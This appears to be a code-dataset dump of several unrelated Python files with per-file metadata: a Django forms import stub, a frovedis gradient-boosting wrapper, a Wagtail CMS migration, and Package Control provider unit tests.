| 38.118343 | 176 | 0.603074 | 894 | 6,442 | 4.098434 | 0.091723 | 0.126092 | 0.105076 | 0.099345 | 0.855076 | 0.837063 | 0.832151 | 0.827238 | 0.827238 | 0.807587 | 0 | 0.019581 | 0.215151 | 6,442 | 168 | 177 | 38.345238 | 0.705103 | 0.099814 | 0 | 0.755725 | 0 | 0.091603 | 0.33512 | 0.141103 | 0 | 0 | 0 | 0.005952 | 0.091603 | 1 | 0.015267 | false | 0 | 0.045802 | 0.007634 | 0.083969 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
225f6bc0f502788ec911d6926269f4beb162e02e | 125 | py | Python | sgi/home/forms.py | jorgevilaca82/SGI | c3f13d9e3e8f04377d9e23636dc8e35ed5ace35a | [
"MIT"
] | null | null | null | sgi/home/forms.py | jorgevilaca82/SGI | c3f13d9e3e8f04377d9e23636dc8e35ed5ace35a | [
"MIT"
] | 8 | 2019-12-07T13:13:34.000Z | 2021-09-02T03:07:25.000Z | sgi/home/forms.py | jorgevilaca82/SGI | c3f13d9e3e8f04377d9e23636dc8e35ed5ace35a | [
"MIT"
] | null | null | null | from django import forms
from django.utils.translation import gettext
from django.utils.translation import gettext_lazy as _
| 31.25 | 54 | 0.856 | 18 | 125 | 5.833333 | 0.5 | 0.285714 | 0.285714 | 0.495238 | 0.742857 | 0.742857 | 0 | 0 | 0 | 0 | 0 | 0 | 0.112 | 125 | 3 | 55 | 41.666667 | 0.945946 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 8 |
97f4ba594ee528c76d9b4cbd4ec4ef9ed238fd76 | 20,267 | py | Python | src/foreign_if/python/main/python/frovedis/mllib/ensemble/gbtree.py | XpressAI/frovedis | bda0f2c688fb832671c5b542dd8df1c9657642ff | [
"BSD-2-Clause"
] | 63 | 2018-06-21T14:11:59.000Z | 2022-03-30T11:24:36.000Z | src/foreign_if/python/main/python/frovedis/mllib/ensemble/gbtree.py | XpressAI/frovedis | bda0f2c688fb832671c5b542dd8df1c9657642ff | [
"BSD-2-Clause"
] | 5 | 2018-09-22T14:01:53.000Z | 2021-12-27T16:11:05.000Z | src/foreign_if/python/main/python/frovedis/mllib/ensemble/gbtree.py | XpressAI/frovedis | bda0f2c688fb832671c5b542dd8df1c9657642ff | [
"BSD-2-Clause"
] | 12 | 2018-08-23T15:59:44.000Z | 2022-02-20T06:47:22.000Z | """
wrapper of frovedis ensemble models - GBT
"""
import pickle
import os.path
import numpy as np
from ...base import *
from ...exrpc import rpclib
from ...exrpc.server import FrovedisServer, set_association, \
check_association, do_if_active_association
from ...matrix.ml_data import FrovedisLabeledPoint
from ...matrix.dtype import TypeUtil
from ..metrics import accuracy_score, r2_score
from ..model_util import M_KIND, ModelID, GLM
class GradientBoostingClassifier(BaseEstimator):
"""A python wrapper of Frovedis Gradient boosted trees: classifier"""
# max_bins: added
# verbose: added
def __init__(self, loss="deviance", learning_rate=0.1, n_estimators=100,
subsample=1.0, criterion="friedman_mse", min_samples_split=2,
min_samples_leaf=1, min_weight_fraction_leaf=0.,
max_depth=3, min_impurity_decrease=0.,
min_impurity_split=None, init=None,
random_state=None, max_features=None,
verbose=0,
max_leaf_nodes=None, warm_start=False,
presort="deprecated", validation_fraction=0.1,
n_iter_no_change=None, tol=1e-4, ccp_alpha=0.0,
max_bins=32):
self.loss = loss
self.learning_rate = learning_rate
self.n_estimators = n_estimators
self.subsample = subsample
self.criterion = criterion
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_leaf
self.min_weight_fraction_leaf = min_weight_fraction_leaf
self.max_depth = max_depth
self.min_impurity_decrease = min_impurity_decrease # min_info_gain
self.min_impurity_split = min_impurity_split
self.init = init
self.random_state = random_state
self.max_features = max_features
self.max_leaf_nodes = max_leaf_nodes
self.warm_start = warm_start
self.presort = presort
self.validation_fraction = validation_fraction
self.n_iter_no_change = n_iter_no_change
self.tol = tol
self.ccp_alpha = ccp_alpha
self.verbose = verbose
# extra
self.__mid = None
self.__mdtype = None
self.__mkind = M_KIND.GBT
self.label_map = None
self.n_classes_ = None
# Frovedis side parameters
self.max_bins = max_bins
self.algo = "Classification"
def validate(self):
"""
NAME: validate
        validates the parameters; raises ValueError if any are invalid
"""
supported_losses = ("deviance", "default")
supported_impurities = ("friedman_mse", "mae", "mse")
if self.loss not in supported_losses:
raise ValueError("Loss '{0:s}' not supported. ".format(self.loss))
if self.learning_rate <= 0.0:
raise ValueError("learning_rate must be greater than 0 but "
"was %r" % self.learning_rate)
if self.n_estimators <= 0:
raise ValueError("n_estimators must be greater than 0 but "
"was %r" % self.n_estimators)
if not (0.0 < self.subsample <= 1.0):
raise ValueError("subsample must be in (0,1] but "
"was %r" % self.subsample)
if self.criterion not in supported_impurities:
raise ValueError("Invalid criterion for GradientBoostingClassifier:"
+ "'{}'".format(self.criterion))
if self.max_depth < 0:
raise ValueError("max depth can not be negative !")
if self.min_impurity_decrease < 0:
raise ValueError("Value of min_impurity_decrease should be "
"greater than 0")
if self.max_bins < 0:
raise ValueError("Value of max_bin should be greater than 0")
if self.random_state is None:
self.random_state = -1
        if isinstance(self.max_features, int):
            self.feature_subset_strategy = "customrate"
            self.feature_subset_rate = (self.max_features * 1.0) / self.n_features_
        elif isinstance(self.max_features, float):
            self.feature_subset_strategy = "customrate"
            self.feature_subset_rate = self.max_features
        elif self.max_features is None:
            self.feature_subset_strategy = "all"
            self.feature_subset_rate = self.n_features_
        elif self.max_features == "auto":
            self.feature_subset_strategy = "auto"
            self.feature_subset_rate = np.sqrt(self.n_features_)
        elif self.max_features == "sqrt":
            self.feature_subset_strategy = "sqrt"
            self.feature_subset_rate = np.sqrt(self.n_features_)
        elif self.max_features == "log2":
            self.feature_subset_strategy = "log2"
            self.feature_subset_rate = np.log2(self.n_features_)
        else:
            raise ValueError("validate: unsupported max_features is encountered!")
# mapping frovedis loss types with sklearn
self.loss_map = {"deviance": "logloss", "exponential": "exponential",
"default": "default"}
@set_association
def fit(self, X, y):
"""
        fits the Gradient Boosting Classifier on the given training data
"""
self.release()
# perform the fit
inp_data = FrovedisLabeledPoint(X, y, \
caller = "[" + self.__class__.__name__ + "] fit: ",\
encode_label = True, binary_encoder=[-1, 1], \
dense_kind = 'colmajor', densify=True)
X, y, logic = inp_data.get()
self._classes = inp_data.get_distinct_labels()
self.n_classes_ = len(self._classes)
self.n_samples_ = inp_data.numRows()
self.n_features_ = inp_data.numCols()
self.label_map = logic
dtype = inp_data.get_dtype()
itype = inp_data.get_itype()
dense = inp_data.is_dense()
self.n_estimators_ = self.n_estimators # TODO: confirm whether frovedis supports n_iter_no_change
self.validate()
self.__mdtype = dtype
self.__mid = ModelID.get()
(host, port) = FrovedisServer.getServerInstance()
rpclib.gbt_train(host, port, X.get(), y.get(),
self.algo.encode('ascii'),
self.loss_map[self.loss].encode('ascii'),
self.criterion.lower().encode('ascii'),
self.learning_rate, # double
self.max_depth, # int
self.min_impurity_decrease, # double
self.random_state, # int seed
self.tol, # double,
self.max_bins, # int
self.subsample, # double
self.feature_subset_strategy.encode('ascii'),
self.feature_subset_rate,
self.n_estimators, self.n_classes_,
self.verbose, self.__mid,
dtype, itype, dense)
excpt = rpclib.check_server_exception()
if excpt["status"]:
raise RuntimeError(excpt["info"])
return self
@check_association
def predict(self, X):
"""
performs classification on an array of test vectors X.
"""
frov_pred = GLM.predict(X, self.__mid, self.__mkind, self.__mdtype, \
False)
return np.asarray([self.label_map[frov_pred[i]] \
for i in range(0, len(frov_pred))])
@property
def classes_(self):
"""classes_ getter"""
if not self.is_fitted():
raise AttributeError("attribute 'classes_' \
might have been released or called before fit")
if self._classes is None:
self._classes = np.sort(list(self.label_map.values()))
return self._classes
@classes_.setter
def classes_(self, val):
"""classes_ setter"""
raise AttributeError(\
"attribute 'classes_' of GradientBoostingClassifier "
"object is not writable")
@set_association
def load(self, fname, dtype=None):
"""
NAME: load
Load the model from a file
"""
if not os.path.exists(fname):
raise ValueError("the model with name %s does not exist!" % fname)
self.release()
target = open(fname + "/label_map", "rb")
self.label_map = pickle.load(target)
target.close()
self._classes = np.sort(list(self.label_map.values()))
metadata = open(fname + "/metadata", "rb")
self.n_classes_, self.__mkind, self.__mdtype = pickle.load(metadata)
metadata.close()
if dtype is not None:
mdt = TypeUtil.to_numpy_dtype(self.__mdtype)
if dtype != mdt:
raise ValueError("load: type mismatches detected! " +
"expected type: " + str(mdt) +
"; given type: " + str(dtype))
self.__mid = ModelID.get()
GLM.load(self.__mid, self.__mkind, self.__mdtype, fname + "/model")
return self
def score(self, X, y, sample_weight=None):
"""
check the accuracy for the model
"""
return accuracy_score(y, self.predict(X), sample_weight=sample_weight)
@check_association
def save(self, fname):
"""
saves the model to a file
"""
if os.path.exists(fname):
raise ValueError("another model with %s name already"
" exists!" % fname)
else:
os.makedirs(fname)
GLM.save(self.__mid, self.__mkind, self.__mdtype, fname + "/model")
target = open(fname + "/label_map", "wb")
pickle.dump(self.label_map, target)
target.close()
metadata = open(fname + "/metadata", "wb")
pickle.dump((self.n_classes_, self.__mkind,
self.__mdtype), metadata)
metadata.close()
@check_association
def debug_print(self):
"""
shows the model
"""
GLM.debug_print(self.__mid, self.__mkind, self.__mdtype)
def release(self):
"""
resets after-fit populated attributes to None
"""
self.__release_server_heap()
self.__mid = None
self.__mdtype = None
self._classes = None
self.label_map = None
self.n_classes_ = None
self.n_samples_ = self.n_features_ = None
@do_if_active_association
def __release_server_heap(self):
"""
to release model pointer from server heap
"""
GLM.release(self.__mid, self.__mkind, self.__mdtype)
def __del__(self):
"""
NAME: __del__
"""
self.release()
def is_fitted(self):
""" function to confirm if the model is already fitted """
return self.__mid is not None
class GradientBoostingRegressor(BaseEstimator):
"""A python wrapper of Frovedis Gradient boosted trees: regressor"""
def __init__(self, loss='ls', learning_rate=0.1, n_estimators=100,
subsample=1.0, criterion='friedman_mse', min_samples_split=2,
min_samples_leaf=1, min_weight_fraction_leaf=0.,
max_depth=3, min_impurity_decrease=0.,
min_impurity_split=None, init=None, random_state=None,
max_features=None, alpha=0.9, verbose=0, max_leaf_nodes=None,
warm_start=False, presort='deprecated',
validation_fraction=0.1,
n_iter_no_change=None, tol=1e-4, ccp_alpha=0.0,
max_bins=32):
self.loss = loss
self.learning_rate = learning_rate
self.n_estimators = n_estimators
self.subsample = subsample
self.criterion = criterion
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_leaf
self.min_weight_fraction_leaf = min_weight_fraction_leaf
self.max_depth = max_depth
self.min_impurity_decrease = min_impurity_decrease # min_info_gain
self.min_impurity_split = min_impurity_split
self.init = init
self.random_state = random_state
self.max_features = max_features
self.alpha = alpha
self.max_leaf_nodes = max_leaf_nodes
self.warm_start = warm_start
self.presort = presort
self.validation_fraction = validation_fraction
self.n_iter_no_change = n_iter_no_change
self.tol = tol
self.ccp_alpha = ccp_alpha
self.verbose = verbose
# extra
self.__mid = None
self.__mdtype = None
self.__mkind = M_KIND.GBT
self.max_bins = max_bins
self.algo = "Regression"
def validate(self):
"""
NAME: validate
        validates the parameters; raises ValueError if any are invalid
"""
supported_losses = ("ls", "lad", "default")
supported_impurities = ("friedman_mse", "mae", "mse")
if self.loss not in supported_losses:
raise ValueError("Loss '{0:s}' not supported. ".format(self.loss))
if self.learning_rate <= 0.0:
raise ValueError("learning_rate must be greater than 0 but "
"was %r" % self.learning_rate)
if self.n_estimators <= 0:
raise ValueError("n_estimators must be greater than 0 but "
"was %r" % self.n_estimators)
if not (0.0 < self.subsample <= 1.0):
raise ValueError("subsample must be in (0,1] but "
"was %r" % self.subsample)
if self.criterion not in supported_impurities:
raise ValueError("Invalid criterion for GradientBoostingClassifier:"
+ "'{}'".format(self.criterion))
if self.max_depth < 0:
raise ValueError("max depth can not be negative !")
if self.min_impurity_decrease < 0:
raise ValueError("Value of min_impurity_decrease should be "
"greater than 0")
if self.max_bins < 0:
raise ValueError("Value of max_bin should be greater than 0")
if self.random_state is None:
self.random_state = -1
        if isinstance(self.max_features, int):
            self.feature_subset_strategy = "customrate"
            self.feature_subset_rate = (self.max_features * 1.0) / self.n_features_
        elif isinstance(self.max_features, float):
            self.feature_subset_strategy = "customrate"
            self.feature_subset_rate = self.max_features
        elif self.max_features is None:
            self.feature_subset_strategy = "all"
            self.feature_subset_rate = self.n_features_
        elif self.max_features == "auto":
            self.feature_subset_strategy = "auto"
            self.feature_subset_rate = np.sqrt(self.n_features_)
        elif self.max_features == "sqrt":
            self.feature_subset_strategy = "sqrt"
            self.feature_subset_rate = np.sqrt(self.n_features_)
        elif self.max_features == "log2":
            self.feature_subset_strategy = "log2"
            self.feature_subset_rate = np.log2(self.n_features_)
        else:
            raise ValueError("validate: unsupported max_features is encountered!")
# mapping frovedis loss types with sklearn
self.loss_map = {"ls": "leastsquareserror", "lad": "leastabsoluteerror",
"default": "default"}
@set_association
def fit(self, X, y):
"""
        fits the Gradient Boosting Regressor on the given training data
"""
# release old model, if any
self.release()
inp_data = FrovedisLabeledPoint(X, y, \
caller = "[" + self.__class__.__name__ + "] fit: ",\
dense_kind = 'colmajor', densify=True)
(X, y) = inp_data.get()
dtype = inp_data.get_dtype()
itype = inp_data.get_itype()
dense = inp_data.is_dense()
self.n_estimators_ = self.n_estimators # TODO: confirm whether frovedis supports n_iter_no_change
self.n_samples_ = inp_data.numRows()
self.n_features_ = inp_data.numCols()
self.validate()
self.__mdtype = dtype
self.__mid = ModelID.get()
(host, port) = FrovedisServer.getServerInstance()
rpclib.gbt_train(host, port, X.get(), y.get(),
self.algo.encode('ascii'),
self.loss_map[self.loss].encode('ascii'),
self.criterion.lower().encode('ascii'),
self.learning_rate, # double
self.max_depth, # int
self.min_impurity_decrease, # double
self.random_state, # int seed
self.tol, # double,
self.max_bins, # int
self.subsample, # double
self.feature_subset_strategy.encode('ascii'),
self.feature_subset_rate,
                         self.n_estimators, -1, # -1 for n_classes, as regressor
self.verbose, self.__mid,
dtype, itype, dense)
excpt = rpclib.check_server_exception()
if excpt["status"]:
raise RuntimeError(excpt["info"])
return self
@check_association
def predict(self, X):
"""
performs prediction on an array of test vectors X.
"""
frov_pred = GLM.predict(X, self.__mid, self.__mkind, self.__mdtype, \
False)
return np.asarray(frov_pred, dtype = np.float64)
@set_association
def load(self, fname, dtype=None):
"""
loads the model from a file
"""
if not os.path.exists(fname):
raise ValueError("the model with name %s does not exist!" % fname)
self.release()
metadata = open(fname + "/metadata", "rb")
self.__mkind, self.__mdtype = pickle.load(metadata)
metadata.close()
if dtype is not None:
mdt = TypeUtil.to_numpy_dtype(self.__mdtype)
if dtype != mdt:
raise ValueError("load: type mismatches detected! " +
"expected type: " + str(mdt) +
"; given type: " + str(dtype))
self.__mid = ModelID.get()
GLM.load(self.__mid, self.__mkind, self.__mdtype, fname + "/model")
return self
def score(self, X, y, sample_weight=None):
"""
check the r2 score for the model
"""
return r2_score(y, self.predict(X), sample_weight=sample_weight)
@check_association
def save(self, fname):
"""
saves model to a file
"""
        if os.path.exists(fname):
            raise ValueError("another model with name %s already"
                             " exists!" % fname)
else:
os.makedirs(fname)
GLM.save(self.__mid, self.__mkind, self.__mdtype, fname + "/model")
metadata = open(fname + "/metadata", "wb")
pickle.dump((self.__mkind,
self.__mdtype), metadata)
metadata.close()
@check_association
def debug_print(self):
"""
shows the model
"""
GLM.debug_print(self.__mid, self.__mkind, self.__mdtype)
def release(self):
"""
resets after-fit populated attributes to None
"""
self.__release_server_heap()
self.__mid = None
self.__mdtype = None
self.n_samples_ = self.n_features_ = None
@do_if_active_association
def __release_server_heap(self):
"""
to release model pointer from server heap
"""
GLM.release(self.__mid, self.__mkind, self.__mdtype)
def __del__(self):
"""
NAME: __del__
"""
self.release()
def is_fitted(self):
""" function to confirm if the model is already fitted """
return self.__mid is not None
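# --- usage sketch (illustrative; not part of the original module) ---
# A minimal end-to-end flow for this frovedis gradient-boosting regressor
# wrapper, assuming a running FrovedisServer, numpy arrays X/y, and that
# the class is exported as GradientBoostingRegressor; `X`, `y` and `path`
# below are placeholder names:
#
#     reg = GradientBoostingRegressor(n_estimators=10, max_depth=4)
#     reg.fit(X, y)              # trains the model on the frovedis server
#     preds = reg.predict(X)     # numpy array of float64 predictions
#     r2 = reg.score(X, y)       # r2 score via sklearn's r2_score
#     reg.save(path)             # writes <path>/model plus <path>/metadata
#     reg.release()              # frees the model handle on the server heap
#     reg = GradientBoostingRegressor().load(path)   # restores a saved model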
| 38.60381 | 105 | 0.575862 | 2,292 | 20,267 | 4.815009 | 0.126091 | 0.017216 | 0.043132 | 0.031714 | 0.868159 | 0.863538 | 0.858644 | 0.847046 | 0.827836 | 0.80319 | 0 | 0.007336 | 0.327379 | 20,267 | 524 | 106 | 38.677481 | 0.80223 | 0.073321 | 0 | 0.828645 | 0 | 0 | 0.091243 | 0.006694 | 0 | 0 | 0 | 0.003817 | 0 | 1 | 0.066496 | false | 0 | 0.025575 | 0 | 0.12532 | 0.01023 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
58b10649e3f14478d512153af38aa8ac5174b86b | 4,593 | py | Python | app/portal/cms/migrations/0010_auto_20210617_2303.py | Ecotrust/OH4S_Proteins | 52ad588ef071064abc5c3f43aa125ad97bff26c4 | [
"Apache-2.0"
] | null | null | null | app/portal/cms/migrations/0010_auto_20210617_2303.py | Ecotrust/OH4S_Proteins | 52ad588ef071064abc5c3f43aa125ad97bff26c4 | [
"Apache-2.0"
] | 185 | 2019-01-23T21:05:15.000Z | 2021-07-01T01:29:14.000Z | app/portal/cms/migrations/0010_auto_20210617_2303.py | Ecotrust/OH4S_Proteins | 52ad588ef071064abc5c3f43aa125ad97bff26c4 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 3.2 on 2021-06-17 23:03
from django.db import migrations
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.embeds.blocks
import wagtail.images.blocks
class Migration(migrations.Migration):
dependencies = [
('cms', '0009_auto_20210615_1823'),
]
operations = [
migrations.AddField(
model_name='producerpage',
name='bottom_blurb',
field=wagtail.core.fields.StreamField([('image', wagtail.images.blocks.ImageChooserBlock()), ('text', wagtail.core.blocks.RichTextBlock(blank=True, features=['h2', 'h3', 'h4', 'bold', 'italic', 'link', 'ol', 'ul', 'hr', 'superscript', 'subscript', 'strikethrough', 'blockquote', 'image', 'embed', 'code'])), ('google_form', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock()), ('link', wagtail.core.blocks.URLBlock())], help_text='The URL for the Google form. This will be loaded into a popup when clicked.', label='Google Form Link', template='cms/google_form.html')), ('HTML', wagtail.core.blocks.RawHTMLBlock(help_text='For fine-tuning very specific/custom blocks.', label='Custom HTML')), ('Embedded_Media', wagtail.embeds.blocks.EmbedBlock(label='Embedded Media'))], blank=True),
),
migrations.AlterField(
model_name='footerpage',
name='column_1',
field=wagtail.core.fields.StreamField([('image', wagtail.images.blocks.ImageChooserBlock()), ('externalLink', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock()), ('link', wagtail.core.blocks.URLBlock())], label='External Link', template='cms/external_link.html')), ('internalLink', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock()), ('link', wagtail.core.blocks.PageChooserBlock())], label='Internal Link', template='cms/internal_link.html')), ('google_form', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock()), ('link', wagtail.core.blocks.URLBlock())], help_text='The URL for the Google form. This will be loaded into a popup when clicked.', label='Google Form Link', template='cms/google_form_footer.html')), ('text', wagtail.core.blocks.RichTextBlock(features=['h2', 'h3', 'h4', 'bold', 'italic', 'link', 'ol', 'ul', 'hr', 'superscript', 'subscript', 'strikethrough', 'blockquote', 'image', 'embed', 'code']))]),
),
migrations.AlterField(
model_name='footerpage',
name='column_2',
field=wagtail.core.fields.StreamField([('image', wagtail.images.blocks.ImageChooserBlock()), ('externalLink', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock()), ('link', wagtail.core.blocks.URLBlock())], label='External Link', template='cms/external_link.html')), ('internalLink', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock()), ('link', wagtail.core.blocks.PageChooserBlock())], label='Internal Link', template='cms/internal_link.html')), ('google_form', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock()), ('link', wagtail.core.blocks.URLBlock())], help_text='The URL for the Google form. This will be loaded into a popup when clicked.', label='Google Form Link', template='cms/google_form_footer.html')), ('text', wagtail.core.blocks.RichTextBlock(features=['h2', 'h3', 'h4', 'bold', 'italic', 'link', 'ol', 'ul', 'hr', 'superscript', 'subscript', 'strikethrough', 'blockquote', 'image', 'embed', 'code']))]),
),
migrations.AlterField(
model_name='footerpage',
name='column_3',
field=wagtail.core.fields.StreamField([('image', wagtail.images.blocks.ImageChooserBlock()), ('externalLink', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock()), ('link', wagtail.core.blocks.URLBlock())], label='External Link', template='cms/external_link.html')), ('internalLink', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock()), ('link', wagtail.core.blocks.PageChooserBlock())], label='Internal Link', template='cms/internal_link.html')), ('google_form', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock()), ('link', wagtail.core.blocks.URLBlock())], help_text='The URL for the Google form. This will be loaded into a popup when clicked.', label='Google Form Link', template='cms/google_form_footer.html')), ('text', wagtail.core.blocks.RichTextBlock(features=['h2', 'h3', 'h4', 'bold', 'italic', 'link', 'ol', 'ul', 'hr', 'superscript', 'subscript', 'strikethrough', 'blockquote', 'image', 'embed', 'code']))]),
),
]
| 120.868421 | 1,001 | 0.690616 | 542 | 4,593 | 5.789668 | 0.184502 | 0.143722 | 0.195029 | 0.09369 | 0.851179 | 0.840344 | 0.840344 | 0.824729 | 0.824729 | 0.824729 | 0 | 0.011043 | 0.11278 | 4,593 | 37 | 1,002 | 124.135135 | 0.759018 | 0.009362 | 0 | 0.419355 | 1 | 0 | 0.314424 | 0.051891 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.16129 | 0 | 0.258065 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
58b629e603912f69b1704f6756f343d38a500221 | 103,635 | py | Python | package_control/tests/providers.py | kimiscool-star/package_control | 8b947d227bfee2b514283e650c3f88c954ae1026 | [
"Unlicense",
"MIT"
] | 1 | 2020-07-20T07:34:44.000Z | 2020-07-20T07:34:44.000Z | package_control/tests/providers.py | kimiscool-star/package_control | 8b947d227bfee2b514283e650c3f88c954ae1026 | [
"Unlicense",
"MIT"
] | null | null | null | package_control/tests/providers.py | kimiscool-star/package_control | 8b947d227bfee2b514283e650c3f88c954ae1026 | [
"Unlicense",
"MIT"
] | 6 | 2020-07-24T05:46:33.000Z | 2021-05-31T13:09:33.000Z | import unittest
from ..providers.repository_provider import RepositoryProvider
from ..providers.channel_provider import ChannelProvider
from ..providers.github_repository_provider import GitHubRepositoryProvider
from ..providers.github_user_provider import GitHubUserProvider
from ..providers.gitlab_repository_provider import GitLabRepositoryProvider
from ..providers.gitlab_user_provider import GitLabUserProvider
from ..providers.bitbucket_repository_provider import BitBucketRepositoryProvider
from ..http_cache import HttpCache
from . import LAST_COMMIT_TIMESTAMP, LAST_COMMIT_VERSION, CLIENT_ID, CLIENT_SECRET
class GitHubRepositoryProviderTests(unittest.TestCase):
maxDiff = None
def github_settings(self):
return {
'debug': True,
'cache': HttpCache(604800),
'query_string_params': {
'api.github.com': {
'client_id': CLIENT_ID,
'client_secret': CLIENT_SECRET
}
}
}
def test_match_url(self):
self.assertEqual(
True,
GitHubRepositoryProvider.match_url('https://github.com/packagecontrol-test/package_control-tester')
)
self.assertEqual(
True,
GitHubRepositoryProvider.match_url(
'https://github.com/packagecontrol-test/package_control-tester/tree/master'
)
)
self.assertEqual(
False,
GitHubRepositoryProvider.match_url('https://github.com/packagecontrol-test')
)
def test_get_packages(self):
provider = GitHubRepositoryProvider(
'https://github.com/packagecontrol-test/package_control-tester',
self.github_settings()
)
packages = [package for package in provider.get_packages()]
self.assertEqual(
[(
'package_control-tester',
{
'name': 'package_control-tester',
'description': 'A test of Package Control upgrade messages with '
'explicit versions, but date-based releases.',
'homepage': 'https://github.com/packagecontrol-test/package_control-tester',
'author': 'packagecontrol-test',
'readme': 'https://raw.githubusercontent.com/packagecontrol-test'
'/package_control-tester/master/readme.md',
'issues': 'https://github.com/packagecontrol-test/package_control-tester/issues',
'donate': None,
'buy': None,
'sources': ['https://github.com/packagecontrol-test/package_control-tester'],
'labels': [],
'previous_names': [],
'releases': [
{
'date': LAST_COMMIT_TIMESTAMP,
'version': LAST_COMMIT_VERSION,
'url': 'https://codeload.github.com/packagecontrol-test'
'/package_control-tester/zip/master',
'sublime_text': '*',
'platforms': ['*']
}
],
'last_modified': LAST_COMMIT_TIMESTAMP
}
)],
packages
)
def test_get_sources(self):
provider = GitHubRepositoryProvider(
'https://github.com/packagecontrol-test/package_control-tester',
self.github_settings()
)
self.assertEqual(
['https://github.com/packagecontrol-test/package_control-tester'],
provider.get_sources()
)
def test_get_renamed_packages(self):
provider = GitHubRepositoryProvider(
'https://github.com/packagecontrol-test/package_control-tester',
self.github_settings()
)
self.assertEqual({}, provider.get_renamed_packages())
def test_get_broken_packages(self):
provider = GitHubRepositoryProvider(
'https://github.com/packagecontrol-test/package_control-tester',
self.github_settings()
)
self.assertEqual(list(), list(provider.get_broken_packages()))
def test_get_dependencies(self):
provider = GitHubRepositoryProvider(
'https://github.com/packagecontrol-test/package_control-tester',
self.github_settings()
)
self.assertEqual(list(), list(provider.get_dependencies()))
def test_get_broken_dependencies(self):
provider = GitHubRepositoryProvider(
'https://github.com/packagecontrol-test/package_control-tester',
self.github_settings()
)
self.assertEqual(list(), list(provider.get_broken_dependencies()))
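# The test classes in this module all exercise the same provider contract:
# a provider type is selected via its classmethod match_url(), constructed
# with (url, settings), and then queried through its get_*() methods. A
# minimal consumption sketch, assuming the fixture URL tested above and a
# settings dict like the one returned by github_settings():
#
#     url = 'https://github.com/packagecontrol-test/package_control-tester'
#     if GitHubRepositoryProvider.match_url(url):
#         provider = GitHubRepositoryProvider(url, settings)
#         for name, info in provider.get_packages():
#             print(name, info['releases'][0]['version'])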
class GitHubUserProviderTests(unittest.TestCase):
maxDiff = None
def github_settings(self):
return {
'debug': True,
'cache': HttpCache(604800),
'query_string_params': {
'api.github.com': {
'client_id': CLIENT_ID,
'client_secret': CLIENT_SECRET
}
}
}
def test_match_url(self):
self.assertEqual(
True,
GitHubUserProvider.match_url('https://github.com/packagecontrol-test')
)
self.assertEqual(
False,
GitHubUserProvider.match_url(
'https://github.com/packagecontrol-test/package_control-tester/tree/master'
)
)
self.assertEqual(
False,
GitHubUserProvider.match_url('https://bitbucket.org/packagecontrol')
)
def test_get_packages(self):
provider = GitHubUserProvider('https://github.com/packagecontrol-test', self.github_settings())
packages = [package for package in provider.get_packages()]
self.assertEqual(
[(
'package_control-tester',
{
'name': 'package_control-tester',
'description': 'A test of Package Control upgrade messages with '
'explicit versions, but date-based releases.',
'homepage': 'https://github.com/packagecontrol-test/package_control-tester',
'author': 'packagecontrol-test',
'readme': 'https://raw.githubusercontent.com/packagecontrol-test'
'/package_control-tester/master/readme.md',
'issues': 'https://github.com/packagecontrol-test/package_control-tester/issues',
'donate': None,
'buy': None,
'sources': ['https://github.com/packagecontrol-test'],
'labels': [],
'previous_names': [],
'releases': [
{
'date': LAST_COMMIT_TIMESTAMP,
'version': LAST_COMMIT_VERSION,
'url': 'https://codeload.github.com/packagecontrol-test'
'/package_control-tester/zip/master',
'sublime_text': '*',
'platforms': ['*']
}
],
'last_modified': LAST_COMMIT_TIMESTAMP
}
)],
packages
)
def test_get_sources(self):
provider = GitHubUserProvider('https://github.com/packagecontrol-test', self.github_settings())
self.assertEqual(['https://github.com/packagecontrol-test'], provider.get_sources())
def test_get_renamed_packages(self):
provider = GitHubUserProvider('https://github.com/packagecontrol-test', self.github_settings())
self.assertEqual({}, provider.get_renamed_packages())
def test_get_broken_packages(self):
provider = GitHubUserProvider('https://github.com/packagecontrol-test', self.github_settings())
self.assertEqual(list(), list(provider.get_broken_packages()))
def test_get_dependencies(self):
provider = GitHubUserProvider('https://github.com/packagecontrol-test', self.github_settings())
self.assertEqual(list(), list(provider.get_dependencies()))
def test_get_broken_dependencies(self):
provider = GitHubUserProvider('https://github.com/packagecontrol-test', self.github_settings())
self.assertEqual(list(), list(provider.get_broken_dependencies()))
